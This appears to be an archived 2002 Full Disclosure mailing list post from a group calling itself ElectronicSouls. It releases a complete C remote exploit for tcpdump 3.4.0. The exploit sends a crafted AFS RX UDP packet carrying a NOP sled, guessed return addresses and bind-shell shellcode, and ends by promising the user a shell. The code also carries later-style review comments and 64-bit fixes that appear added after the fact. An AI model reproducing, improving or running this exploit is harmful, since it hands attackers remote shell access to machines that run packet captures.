Full Disclosure mailing list archives

[ElectronicSouls] - tcpdump exploit


From: es () hush com
Date: Fri, 29 Nov 2002 00:11:44 -0800


-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

We are releasing this for political reasons.  We don't need to backdoor
tcpdump to get root on you, like those scriptkiddies do (apparently a jab
at the trojaned tcpdump/libpcap source tarballs found on tcpdump.org earlier
that month); we can find our own bugs to exploit from mailing lists and then
write our exploits.

Enjoy.

# cat  ES-tcpdump-xp-not-finished.c
   /*
    * MAD PRIVATE !%&#*
    * Linux x86 Tcpdump 3.4.0 (maybe others!) Remote Exploit -- the target must be
    * capturing with a snapshot length of at least 500 bytes (tcpdump -s 500 or higher)
    * (C) BrainStorm - ElectronicSouls - \x45\x53 0wnez ;)
    * DO NOT DISTRIBUTE !
    */

    #include <errno.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <netdb.h>

    #define ADDR                    0xbffff248  /* guessed return address on the 32-bit Linux target; main() adds [offset] */
    #define OFFSET                  0           /* default offset when argv[2] is not given */
    #define NUM_ADDR                10          /* copies of the return address written after the 'A' filler */
    #define NOP                     0x90        /* x86 NOP, used to build the sled */
    #define NUM_NOP                 100         /* length of the NOP sled in bytes */

    #define RX_CLIENT_INITIATED     1           /* value main() stores in rx_header.flags */
    #define RX_PACKET_TYPE_DATA     1           /* value main() stores in rx_header.type */
    #define FS_RX_DPORT             7000        /* UDP port the packet is sent to ("FS" presumably = AFS fileserver) */
    #define FS_RX_SPORT             7001        /* local UDP port the sender binds before sending */
    #define AFS_CALL                134         /* first 32-bit word after the RX header */

    /*
     * RX packet header as this exploit lays it out on the wire: five 32-bit
     * words, four single-byte fields and two 16-bit fields -- 28 bytes with
     * no padding on the targeted 32-bit x86 (every field is naturally
     * aligned).  main() sets only type, seq and flags; everything else stays
     * zero from the memset of the send buffer.
     * NOTE(review): the field order is presumably tcpdump's print-rx.c view
     * of the AFS Rx header -- confirm against that source before touching it.
     */
    struct rx_header
    {
        u_int32_t epoch;
        u_int32_t cid;
        u_int32_t callNumber;
        u_int32_t seq;          /* main() stores htonl(1) */
        u_int32_t serial;
        u_char type;            /* main() stores RX_PACKET_TYPE_DATA */
        u_char flags;           /* main() stores RX_CLIENT_INITIATED */
        u_char userStatus;
        u_char securityIndex;
        u_short spare;
        u_short serviceId;
    };

    /*
     * Linux/x86 bind-shell payload (Taeho Oh's; the original note says it
     * listens on port 30464).  main() copies it with strlen(), so the bytes
     * below must stay free of 0x00 -- they currently are.  main() also
     * overwrites byte 30 before copying, for a reason the post does not give.
     */
    char shellcode[] = /* Taeho Oh bindshell code at port 30464 */
    "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
    "\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
    "\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
    "\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
    "\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
    "\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
    "\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
    "\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
    "\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
    "\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
    "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
    "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";

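    /*
     * Resolve a dotted-quad string or a host name to an IPv4 address.
     *
     * name:    "1.2.3.4" style address or a host name.
     * Returns: the address in network byte order (the caller stores it in
     *          sin_addr.s_addr); the return type stays long so existing
     *          call sites do not change.
     * Exits the process with -1 if the name cannot be resolved.
     *
     * Fixes over the original: inet_addr() returns an in_addr_t, and the
     * original kept it in a long and compared it with -1.  On LP64 hosts
     * INADDR_NONE widens to 0xffffffff, the comparison is always false,
     * host names are never looked up and the caller quietly targets
     * 255.255.255.255.  The glibc h_addr macro is also hidden under strict
     * -std=c11, so h_addr_list[0] is used directly, and the copy length is
     * taken from the hostent instead of being hard-coded.
     * Known limitation (inherited): "255.255.255.255" is indistinguishable
     * from an inet_addr() failure and falls through to the resolver.
     */
    long resolve(char *name)
    {
        in_addr_t ip = inet_addr(name);

        if (ip == INADDR_NONE) {
            struct hostent *hp = gethostbyname(name);

            if (hp == NULL || hp->h_addrtype != AF_INET ||
                hp->h_length != (int)sizeof(ip) || hp->h_addr_list[0] == NULL) {
                fprintf(stderr, "Can't resolve host name [%s].\n", name);
                exit(-1);
            }
            /* h_addr_list entries are already in network byte order. */
            memcpy(&ip, hp->h_addr_list[0], sizeof(ip));
        }
        return (long)ip;
    }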

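    /* Send-buffer geometry.  PACKET_LEN is exactly what the original put on
     * the wire; whatever follows the ACL trailer is zero padding. */
    enum {
        BUF_LEN    = 4048,   /* build buffer size, as in the original */
        PACKET_LEN = 520,    /* UDP payload length actually sent */
        PAD_LEN    = 120     /* bytes of 'A' filler before the return addresses */
    };

    /*
     * Store a 32-bit value at p as raw bytes and return the advanced cursor.
     * memcpy is used instead of a pointer store so the build buffer needs no
     * particular alignment and each slot is exactly 4 bytes on every host.
     * The original used `long int *` slots, which are 8 bytes on LP64 and
     * silently scrambled the payload layout on 64-bit builds.
     */
    static char *put_u32(char *p, uint32_t v)
    {
        memcpy(p, &v, sizeof(v));
        return p + sizeof(v);
    }

    /*
     * Entry point.  Builds one RX "data" packet carrying an oversized ACL
     * text, sends it as a single UDP datagram to <host>:FS_RX_DPORT from
     * local port FS_RX_SPORT, and exits.  The post describes this only as
     * an overflow in tcpdump 3.4.0; which buffer it hits is not stated here.
     *
     * argv[1]  target host (dotted quad or name, see resolve())
     * argv[2]  optional decimal offset added to ADDR, the guessed return address
     *
     * Payload layout (byte offsets from the start of the UDP payload, with
     * the 28-byte header of the 32-bit target):
     *   0    struct rx_header  type=DATA, seq=1, flags=CLIENT_INITIATED, rest 0
     *   28   five big-endian words: AFS_CALL, 1, 2, 3, 420
     *   48   "1 0\n"                      start of the ACL text
     *   52   PAD_LEN x 'A'                filler
     *   172  NUM_ADDR x return_addr       host byte order (raw pointer value)
     *   212  NUM_NOP x NOP                sled
     *   312  shellcode                    bind shell
     *   +len " 1\n"                       ACL trailer; zero padding up to PACKET_LEN
     *
     * Returns 0 after sending; exits with -1 on usage, resolver, socket,
     * bind, payload-size or send errors.
     */
    int main(int argc, char *argv[])
    {
        struct sockaddr_in target, local;
        struct rx_header hdr;
        char buffer[BUF_LEN];
        char *p;
        const char *end;
        uint32_t return_addr = ADDR;
        long offset = OFFSET;
        size_t sc_len, need;
        int sock, i;

        fprintf(stderr, "\n\n [ E l e c t r o n i c S o u l s ] \n");
        fprintf(stderr, "Tcpdump 3.4.0 Remote Exploit by BrainStorm\n\n");

        if (argc < 2) {
            printf("Usage: %s <host> [offset]\n", argv[0]);
            exit(-1);
        }

        /* atoi() turned garbage into a silent 0; reject it instead. */
        if (argc == 3) {
            char *tail;
            errno = 0;
            offset = strtol(argv[2], &tail, 10);
            if (tail == argv[2] || *tail != '\0' || errno == ERANGE) {
                fprintf(stderr, "Bad offset [%s].\n", argv[2]);
                exit(-1);
            }
        }
        /* A negative offset wraps modulo 2^32, exactly as the original's
         * 32-bit long arithmetic did. */
        return_addr += (uint32_t)offset;
        fprintf(stderr, "[+] Using return addr: %#lx\n", (unsigned long)return_addr);

        memset(&target, 0, sizeof(target));
        target.sin_family      = AF_INET;
        target.sin_addr.s_addr = (in_addr_t)resolve(argv[1]);
        target.sin_port        = htons(FS_RX_DPORT);

        sock = socket(AF_INET, SOCK_DGRAM, 0);
        if (sock < 0) {
            perror("socket()");
            exit(-1);
        }

        /* The source port is fixed at FS_RX_SPORT rather than kernel-chosen;
         * presumably the target's dissector keys on the port pair. */
        memset(&local, 0, sizeof(local));
        local.sin_family      = AF_INET;
        local.sin_addr.s_addr = INADDR_ANY;
        local.sin_port        = htons(FS_RX_SPORT);
        if (bind(sock, (struct sockaddr *)&local, sizeof(local)) < 0) {
            perror("bind()");
            close(sock);
            exit(-1);
        }

        /* ---- build the RX data packet ---- */
        memset(buffer, 0, sizeof(buffer));
        end = buffer + PACKET_LEN;

        /* Header is built in a properly aligned object, then copied in. */
        memset(&hdr, 0, sizeof(hdr));
        hdr.type  = RX_PACKET_TYPE_DATA;
        hdr.seq   = htonl(1);
        hdr.flags = RX_CLIENT_INITIATED;
        memcpy(buffer, &hdr, sizeof(hdr));
        p = buffer + sizeof(hdr);

        /* Five big-endian words; the post does not explain the last four. */
        p = put_u32(p, htonl(AFS_CALL));
        p = put_u32(p, htonl(1));
        p = put_u32(p, htonl(2));
        p = put_u32(p, htonl(3));
        p = put_u32(p, htonl(420));

        /* ACL text begins here; the overlong "entry" that follows is the
         * overflow.  memcpy rather than sprintf: no NUL is wanted. */
        memcpy(p, "1 0\n", 4);
        p += 4;

        memset(p, 'A', PAD_LEN);
        p += PAD_LEN;

        /* Deliberately NOT htonl()'d: this is a raw pointer value that must
         * sit in memory the way the target CPU reads a saved return address. */
        for (i = 0; i < NUM_ADDR; i++)
            p = put_u32(p, return_addr);

        memset(p, NOP, NUM_NOP);
        p += NUM_NOP;

        /* The original patches byte 30 of the shellcode before copying and
         * gives no reason (the file is labelled "not-finished"); kept as is.
         * strlen() is only correct because the payload has no 0x00 byte. */
        shellcode[30] = (char)(46);
        sc_len = strlen(shellcode);

        /* Everything above is fixed-size; make sure the variable tail fits so
         * a longer payload cannot be silently cut off at PACKET_LEN. */
        need = sc_len + 3;                               /* shellcode + " 1\n" */
        if ((size_t)(end - p) < need) {
            fprintf(stderr, "payload is %zu bytes too long for a %d-byte packet\n",
                    need - (size_t)(end - p), PACKET_LEN);
            close(sock);
            exit(-1);
        }
        memcpy(p, shellcode, sc_len);
        p += sc_len;
        memcpy(p, " 1\n", 3);                            /* ACL trailer */

        /* Cast was missing in the original (sockaddr_in* is not sockaddr*). */
        if (sendto(sock, buffer, PACKET_LEN, 0,
                   (struct sockaddr *)&target, sizeof(target)) < 0) {
            perror("send()");
            close(sock);
            exit(-1);
        }
        fprintf(stderr, "Overflow sent, now wait for your shell =) ..\n\n");
        close(sock);
        return 0;
    }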

#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"Winner of the Best Eyes Award"

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nIU8MHGVzQGh1c2guY29tAAoJEN5nGqhGcjltGnYAnRPF4oJBlaU0
2AGLKlLdTNrRinezAJ9EpWGLb2K8esivw+01R5LKf4mCxQ==
=Bh2L
-----END PGP SIGNATURE-----





